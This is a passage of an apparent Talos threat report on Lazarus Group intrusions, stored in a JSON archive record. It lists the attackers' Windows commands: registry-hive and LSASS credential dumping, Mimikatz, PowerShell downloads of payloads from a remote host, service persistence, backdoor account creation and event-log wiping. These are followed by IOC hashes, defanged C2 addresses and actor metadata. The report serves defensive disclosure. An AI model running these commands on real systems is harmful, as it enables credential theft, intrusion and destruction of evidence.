Using a WMIC command, the attackers also collect\r\ninformation about the logical drives of the infected systems.\r\nThen, the attackers harvest and exfiltrate credentials. During the reconnaissance stage, the attackers specifically check if\r\nthe RDP port is open. If it is and the attackers decrypt any of the harvested credentials, they would have direct access to\r\nthe system without the need to install any other backdoor. The complete list of commands is provided in the table\r\nbelow.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 16 of 25\n\nCommand Intent\r\ncmd.exe /c ipconfig /all\r\nNetwork discovery\r\n[T1590]\r\ncmd.exe /c dir c:\"Program Files (x86)\r\nInstalled software\r\n[T1518]\r\ncmd.exe /c dir c:\"Program Files\r\nInstalled software\r\n[T1518]\r\ncmd.exe /c systeminfo\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd /C qwinsta\r\nUser Discovery\r\n[T1033]\r\ncmd /C nslookup\r\nNetwork discovery\r\n[T1590]\r\ncmd /C netstat -noa | findstr 3389\r\nNetwork discovery\r\n[T1590]\r\ncmd /C net view /domain\r\nDomain discovery\r\n[T1087/002]\r\ncmd /C wmic logicaldisk get deviceid, size\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd.exe /c reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\WinStations\\RDP-Tcp\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd.exe /Q /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:20 /q:*[System [(EventID=25)]] /rd:true /f:text 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nQuery event logs -\r\nGet RDP session\r\nreconnection\r\ninformation\r\nnetsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP\r\nlocalport=3389 action=allow\r\nModify Firewall\r\n[T1562/004]\r\nreg.exe add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\WinStations\\RDP-Tcp /v PortNumber /t REG_DWORD /d 3389 /f\r\nConfigure RDP\r\n[T1021/001]\r\nCredential harvesting\r\nIn 
some intrusions, the attackers saved copies of registry hives for subsequent exfiltration for obtaining credentials and\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 17 of 25\n\npolicy information.\r\nCommand Intent\r\ncmd.exe /c reg save hklm\\sam \u003clocal_path\u003e\\zsam.tmp\r\nCredential harvesting\r\n[T1003]\r\ncmd.exe /c reg save hklm\\security \u003clocal_path\u003e\\zsec.tmp\r\nCredential harvesting\r\n[T1003]\r\ncmd.exe /c reg save hklm\\system \u003clocal_path\u003e\\zsys.tmp\r\nCredential harvesting\r\n[T1003]\r\n\u003clocal_path\u003e\\rar.exe a \u003clocal_path\u003e\\zzzzz.tmp \u003clocal_path\u003e\\zs*.tmp\r\nArchive Collected\r\nData [T1560]\r\ncmd.exe /c copy /y \u003clocal_path\u003e\\zzzzz.tmp c:\"Program Files\\\"VMware\r\nView\\server\\broker\\webapps\\portal\\webclient\\z.tmp\r\nArchive Collected\r\nData [T1560]\r\nThe attackers also typically use a malicious batch (.bat) file called \"adfind.bat\" to execute adfind.exe on some of the\r\ninfected endpoints to get AD information from the endpoints.\r\nWe also observed the use of dsquery to obtain similar information.\r\nCommand Intent\r\ncmd.exe /Q /c echo dsquery computer ^\u003e \\\\127.0.0.1\\C$\\\u003cimpacket_log_file\u003e\r\n2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery group -name GroupName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003e 2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery computer -name ComputerName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003e 2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery user -name UserName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003et 2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\nUnauthorized account creations\r\nIn most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they\r\nhad 
initial access to. Similar activity was also seen being conducted via the VSingle implant as it was propagated across\r\nan enterprise.\r\nCommand Intent\r\nnet1 group /domain Domain discovery [T1087/002]\r\nnet1 user \u003cusername\u003e \u003cpassword\u003e /domain Create Account [T1136/002]\r\nnet1 user \u003cusername\u003e /active:yes /domain Create Account [T1136/002]\r\nnet1 group \u003cgroupname\u003e /add /domain Create Account [T1136/002]\r\nnet1 group \u003cgroupname\u003e \u003cusername\u003e /add /domain Create Account [T1136/002]\r\nAdditional tools used\r\nIn some cases, the attackers deployed commonly used tools often seen from other threat actors.\r\nMimikatz\r\nThe attackers downloaded the Mimikatz tool from their server, inside a .rar archive protected with a password, which\r\nprevents any kind of detection by network intrusion prevention systems.\r\nCommand Intent\r\npowershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mi.tmp', '\u003clocal_path\u003e\\m.tmp')\r\nDownload Payloads [T1608/001]\r\npowershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mi64.tmp', '\u003clocal_path\u003e\\mi.tmp')\r\nDownload Payloads [T1608/001]\r\npowershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mm.rar', '\u003clocal_path\u003e\\mm.tmp')\r\nDownload Payloads [T1608/001]\r\n\u003clocal_path\u003e\\rar.exe e \u003clocal_path\u003e\\m.tmp \u003clocal_path\u003e\\ -p\u003cpassword\u003e\r\nExtract files [T1140]\r\n\u003clocal_path\u003e\\mi.exe privilege::debug sekurlsa::logonPasswords exit\r\nOS Credential Dumping [T1003/001]\r\nProcdump\r\nAlong with Mimikatz, the attackers also used procdump to dump the LSASS memory to a file on 
disk.\r\nCommand Intent\r\npowershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/pd64.tmp', '\u003clocal_path\u003e\\pd.tmp')\r\nDownload Payloads [T1608/001]\r\nren \u003clocal_path\u003e\\pd.tmp pd64.exe Rename files\r\n\u003clocal_path\u003e\\pd64.exe -accepteula -ma lsass \u003clocal_path\u003e\\z_pd.dmp\r\nOS Credential Dumping [T1003/001]\r\nSocks proxy\r\nIn another instance, the attackers downloaded and set up a SOCKS proxy on the local endpoint, including the use of\r\n3proxy.\r\nCommand Intent\r\npowershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/spr.tmp', '\u003clocal_path\u003e\\spr.tmp')\r\nDownload Payloads [T1608/001]\r\n\u003clocal_path\u003e\\rar.exe e \u003clocal_path\u003e\\spr.tmp \u003clocal_path_2\u003e -p\u003cpassword\u003e\r\nExtract files [T1140]\r\n\u003clocal_path_2\u003e\\msconf.exe -i 84[.]38[.]133[.]145 -p \u003cPort_number\u003e Proxy [T1090]\r\nImplant deployment and lateral movement\r\nAcross the first endpoints compromised in the enterprises, we observed the attackers downloading their custom\r\nimplants from remote locations and deploying and persisting them on the systems.\r\nCommand Intent\r\nWMIC /node:\u003cComputer_Name\u003e process call create \"powershell.exe (New-Object System.Net.Webclient).DownloadFile('\u003cremote_location\u003e/svhostw.exe','\u003clocal_path\u003e\\\\svhostww.exe')\"\r\nDownload Payloads [T1608/001]\r\nsc create \u003cservice_name\u003e type= own type= interact start= auto error= ignore binpath= cmd /K start \u003clocal_path_2\u003e\\\\svhostww.exe\r\nPersistence [T1543/003]\r\nOn the endpoints that were breached by performing lateral movement from an already compromised host, the implants\r\nwere deployed either from a remote external location or the 
source host itself by opening up interactive shells and the\r\nuse of impacket tools:\r\nCommand Intent\r\npowershell.exe Enter-PSSession\r\nRemote Access [T1219]\r\npowershell.exe Invoke-Command -ComputerName \u003cComputerName\u003e -ScriptBlock {cmd.exe /c dir}\r\nRemote Access [T1219]\r\npython wmiexec.py \u003cuserid\u003e:\u003cpassword\u003e@\u003clocal_IP_of_another_endpoint\u003e 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nRemote Access [T1219]\r\nCleanup\r\nOnce the backdoors and implants were persisted and activated on the endpoint, the reverse shell was used to perform\r\ncleanup [T1070]. This included deleting all files in the infection folder along with the termination of the PowerShell\r\ntasks. The attacker-created accounts were removed and, finally, the Windows Event logs [T1070/001] would be purged\r\nwith the command below.\r\nfor /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003clog_file_name\u003e 2\u003e\u00261\r\nManual operations\r\nIn multiple instances, the attackers mistyped commands on the infected endpoint via the reverse shell, indicating that\r\nthe commands were being served by an operator manually operating the infections:\r\nip config /all\r\nnet suer\r\nnetstat -noa | finstr 3389\r\npowrshell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount\r\npowrshell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed\r\nin this post. 
Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. 
For specific OSqueries on this threat, click here and here.\r\nIOCS\r\nThe IOC list is also available in Talos' Github repo here.\r\nVSingle\r\n586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730\r\nMagicRAT\r\n8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5\r\nc2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f\r\ndda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469\r\n90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4\r\nYamaBot\r\n226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\nProcdump\r\n16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5\r\n05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD\r\nMimikatz\r\n6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B\r\n912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\r\nCAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65\r\n3Proxy\r\n2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e\r\nPuTTY plink\r\n2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780\r\n5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8\r\nAdfind\r\nC92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3\r\nIPs\r\n104[.]155[.]149[.]103\r\n40[.]121[.]90[.]194\r\n185[.]29[.]8[.]162\r\n146[.]4[.]21[.]94\r\n46[.]183[.]221[.]109\r\n84[.]38[.]133[.]145\r\n109[.]248[.]150[.]13\r\n155[.]94[.]210[.]11\r\n192[.]186[.]183[.]133\r\n54[.]68[.]42[.]4\r\n213[.]180[.]180[.]154\r\nURLS\r\nhxxp[://]104[.]155[.]149[.]103/2-443[.]ps1\r\nhxxp[://]104[.]155[.]149[.]103/8080[.]ps1\r\nhxxp[://]104[.]155[.]149[.]103/mi64[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/mi[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/mm[.]rar\r\nhxxp[://]104[.]155[.]149[.]103/pd64[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/rar[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/spr[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/t[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/update[.]tmp\r\nhxxp[://]109[.]248[.]150[.]13:8080/1\r\nhxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php\r\nhxxp[://]185[.]29[.]8[.]162:443/1[.]tmp\r\nhxxp[://]40[.]121[.]90[.]194/11[.]jpg\r\nhxxp[://]40[.]121[.]90[.]194/300dr[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/b[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/qq[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/ra[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/Rar[.]jpg\r\nhxxp[://]40[.]121[.]90[.]194/tt[.]rar\r\nhxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe\r\nhxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe\r\nhxxp[://]84[.]38[.]133[.]145/board[.]html\r\nhxxp[://]84[.]38[.]133[.]145/header[.]xml\r\nhxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php\r\nhxxp[://]www[.]ajoa[.]org/home/rar[.]tmp\r\nhxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1\r\nhxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp\r\nhxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp\r\nVSingle C2s\r\nhxxps[://]tecnojournals[.]com/review\r\nhxxps[://]semiconductboard[.]com/xml\r\nhxxp[://]cyancow[.]com/find\r\nMagicRAT C2s\r\nhxxp[://]155[.]94[.]210[.]11/news/page[.]php\r\nhxxp[://]192[.]186[.]183[.]133/bbs/board[.]php\r\nhxxp[://]213[.]32[.]46[.]0/board[.]php\r\nhxxp[://]54[.]68[.]42[.]4/mainboard[.]php\r\nhxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php\r\nhxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php\r\nhxxp[://]www[.]easyview[.]kr/board/Kheader[.]php\r\nhxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php\r\nYamaBot C2s\r\nhxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php\r\nSource: https://blog.talosintelligence.com/lazarus-three-rats/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/lazarus-three-rats/"
	],
	"report_names": [
		"lazarus-three-rats"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434310,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.pdf",
		"text": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.txt",
		"img": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.jpg"
	}
}